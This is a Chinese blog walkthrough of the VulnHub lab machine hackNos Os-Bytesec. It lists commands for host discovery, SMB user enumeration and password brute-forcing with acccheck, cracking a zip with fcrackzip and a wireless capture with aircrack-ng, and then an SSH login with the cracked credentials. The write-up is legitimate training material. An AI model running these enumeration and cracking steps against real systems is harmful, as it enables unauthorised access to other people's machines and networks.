Hacknos-OS-Bytesec靶机渗透测试

已于 2024-07-12 14:51:57 修改
阅读量375 收藏 8
点赞数 3
文章标签: mysql
于 2024-07-12 14:30:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/140378510
版权

一、靶机下载地址

hackNos: Os-Bytesec ~ VulnHub

二、信息收集

1、主机发现

#使用命令
nmap 192.168.7.0/24 -sn | grep -B 2 '08:00:27:D9:03:37'

2、端口扫描

#使用命令
nmap 192.168.7.140 -p- -sV

3、指纹识别

#使用命令
whatweb http://192.168.7.140

4、目录扫描

#使用命令
dirsearch -u "http://192.168.7.140"

三、获取webshell

1、访问靶机IP,发现底部信息,转战SMB攻击

2、使用enum4linux工具与acccheck工具对目标主机查询用户信息与枚举用户密码,发现账户为smb且密码为空

#枚举目标用户
enum4linux -U 192.168.7.140

#acccheck工具下载地址
git clone https://github.com/qashqao/acccheck.git 

#acccheck工具的使用
cd acccheck
./acccheck.pl -t 192.168.7.140 -u smb -v

#注
acccheck.pl文件是没有权限的,得赋予权限才能使用
#使用命令
chmod 777 acccheck.pl

3、使用smbmap枚举靶机的共享资源并使用smbclient进行登录

#枚举靶机的共享资源
smbmap -u 'smb' -p '' -H 192.168.7.140     
#查看靶机的共享目录
smbclient -L 192.168.7.140 -U smb
#登录目标靶机  
smbclient //192.168.7.140/print$ -U smb

4、尝试进入smb用户的目录下,发现有两个文件并使用get命令下载

#进入到smb用户目录下
smbclient //192.168.7.140/smb -U smb
#下载两个文件
get main.txt
get safe.zip

5、查看下载下来的文件main.txt中只有个字符串helo,而解压safe.zip需要密码,这里使用fcrackzip进行破解,得到压缩包密码:hacker1

#下载fcrackzip工具
apt-get install fcrackzip

#解压rockyou.txt.gz文件
cd /usr/share/wordlists/
gzip -d rockyou.txt.gz

#使用fcrackzip工具进行爆破
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

6、解压safe.zip文件,得到secret.jpguser.cap两个文件

#解压safe.zip文件
unzip safe.zip

7、解压缩包后发现两个文件secret.jpg图片文件和user.cap网络包文件并使用Wireshark查看为无线网络数据包,发现无线网络的SSID为blackjax.,这里使用aircrack-ng破解无线密码

#使用命令
aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

8、上一步破解出无线名称密码为blackjax:snowflake尝试SSH登录目标主机,成功登录,获取flag

#使用命令
ssh blackjax@192.168.7.140 -p 2525

果冻*果冻*
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
靶机hackNos Os-Bytesec练习报告
黑战士的博客
05-21 997
1. 之前只接触过windows下的smb漏洞,首次了linux下的smb的扫描和利用方式\2. 学习了suid的linux提权工具,多角度考虑提权方式,不要死磕一种方式。
Hacknos-OS-Bytesec靶机
weixin_74232792的博客
07-12 710
Hacknos-OS-Bytesec靶机
VulnHub靶机Hacknos-OS-Bytesec
wbplife的博客
07-12 394
靶机 IP:192.168.7.123靶机目标:普通用户Flag与root用户目录下的root.txt文件...学习目标:漏洞利用/暴力破解/权限提升。
Vulnhub:Os-Bytesec靶机渗透
m0_62008601的博客
12-04 1106
基本的渗透过程以及linux下的PATH环境变量提权
web小项目-曼波生日录(Servlet+JSP+MySQL)
m0_75138009的博客
07-24 853
当记录条数过多时会自动出现滚轮,数据不会超出紫框。
Redis与MySQL数据一致性问题的策略模式及解决方案
qq_36451127的博客
07-24 2239
(1)实际开发中一般使用使用了缓存更新策略模式,此方案最大程度上保证了数据的一致性并且实现也最简单(2)无论是先操作数据库再删除缓存还是先删除缓存再操作数据库都有可能会出现删除缓存失败的情况,所以需要加入删除重试机制(3)如果想要Redis和Mysql的数据强一致性,可以考虑使用加锁的方式实现。
MySQL DBA 修炼之道》第四章 开发进阶
最新发布
Trishia的博客
07-25 585
博主学习《MySQL DBA 修炼之道》结合自身理解的总结。主要讲解了范式、反范式、慢SQL查询、事务和锁等。
MySql 主从同步会不会影响到SQL执行速度?
weixin_44892327的博客
07-24 813
作用:负责将主库的二进制日志(binary log)数据传输到从库。工作方式:当从库连接到主库时,主库会为每个连接的从库开启一个 Binlog Dump 线程。这个线程从主库的二进制日志中读取日志记录,并将其发送给从库。Binlog Dump 线程:将二进制日志传输给从库。Binlog Dump GTID 线程(在启用 GTID 模式时):处理 GTID 相关的复制任务。
测试环境搭建整套大数据系统(十七:mysql同步,字段类型映射错误问题)
weixin_43446246的博客
07-24 428
mysql表hive表其中 type是字符串类型,但是yarn上一直报错number这个类是往int类型转才会使用到的。
MySQL中的CREATE EVENT 语句详解
u011565038的博客
07-24 573
CREATE EVENT语句在 MySQL 中用于创建一个事件调度器(Event Scheduler)的事件。事件调度器允许你安排数据库任务(如查询、数据更新等)在将来的某个时间点自动执行,或者根据特定的时间间隔重复执行。这对于需要定期执行的任务特别有用,比如数据清理、报表生成等。
sql注入 mysql 执行命令 sql注入以及解决的办法
QQ3007250950的博客
07-23 1005
所以后面的where条件是一个恒等式,表所有的行都符合字符串1等于字符串1这个条件,又是或的关系,所以所有的行全部匹配,全部被搜索出来,这样再用行数来判断用户是否能登陆已经根本不行了,因为查出来的是所有行。这句超级简单吧,我们都知道,这句最常用的是在登陆的时候,来查询用户输入的账号和密码匹配不匹配,来确定用户是否可以登陆的,大体上一看好像没啥问题,但是呢,假如我是一名黑客,我可以用一种巧妙地方式来登陆你这个系统,我账号随意输入一个,密码我输入一个 1 ‘or’ 1’='1 什么意思呢?
[Mysql-DML数据操作语句]
2301_78794952的博客
07-23 1070
insert into student (sid,sname,birthday,ssex,classid) values(9,'张三','2007-1-1','男',1);insert into student(sname,ssex) values('某某1','男'),('某某2','女'),('某某3','男');insert into student values(9,'张三','2007-1-1','男',1);-- 将姓名为某某的生日改为1888-1-1。
详解Mysql InnoDB引擎 04
程序员进阶之路
07-24 695
InnoDB 是MySQL数据库管理系统的一个存储引擎,它为MySQL提供了事务处理、外键约束和并发控制等关系型数据库管理系统(RDBMS)中重要的功能。以下是关于InnoDB存储引擎的一些关键特点和特性:
MySQL多实例的配置
qq_63926306的博客
07-24 787
安装多实例数据库。
Mysql的索引
2401_84592402的博客
07-24 494
索引是一个排序的列表,在列表当中存储索引的值以及索引对应数据所在的物理行索引值和数据是一个映射关系。
mysqlbackup与xtrabackup的对比
cc20100608的专栏
07-24 324
MySQL数据库管理中,备份是确保数据安全性和可恢复性的重要环节。在众多备份工具中,mysqlbackup和xtrabackup是两款备受关注的工具。本文将围绕这两款工具进行详细对比,以探讨它们的优缺点,并试图给出在何种场景下更适合使用哪款工具。
MySQL:增删改查、临时表、授权相关示例
变成我......
07-24 865
Linux系统下MySQL服务的增删改查、临时表、授权相关实例,以及相关概念的讲解
windows压缩包爆破
08-13
要在Windows上进行压缩包的爆破,您可以使用工具rarcrack。rarcrack可以指定要爆破的文件类型,如rar、zip、7z,并可以定义最大长度等参数。它最大支持12线程来加速爆破过程。使用命令rarcrack [压缩包路径 -threads 12 -type [压缩包类型可以进行爆破操作。然而,需要注意的是,爆破过程可能需要一定的时间,并且并不保证一定能成功破解密码。有时候可能会出现没有结果或速度较慢的情况。另外,如果您需要爆破zip压缩包,您还可以使用工具fcrackzip。使用命令fcrackzip [压缩包路径可以进行zip压缩包的爆破。 [2] 引用 > [保存密码哈希的文件可以提取密码哈希。然后使用John the Ripper等工具进行破解。 [3<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [如何才能简洁高效不失优雅的爆破ZIP文件?](https://blog.csdn.net/zxsctf/article/details/131356650)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [【甄选靶场】Vulnhub百个项目渗透——项目四十八:HACKNOSOS-BYTESEC(压缩包爆破,无线爆破,环境变量...](https://blog.csdn.net/weixin_65527369/article/details/127443994)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值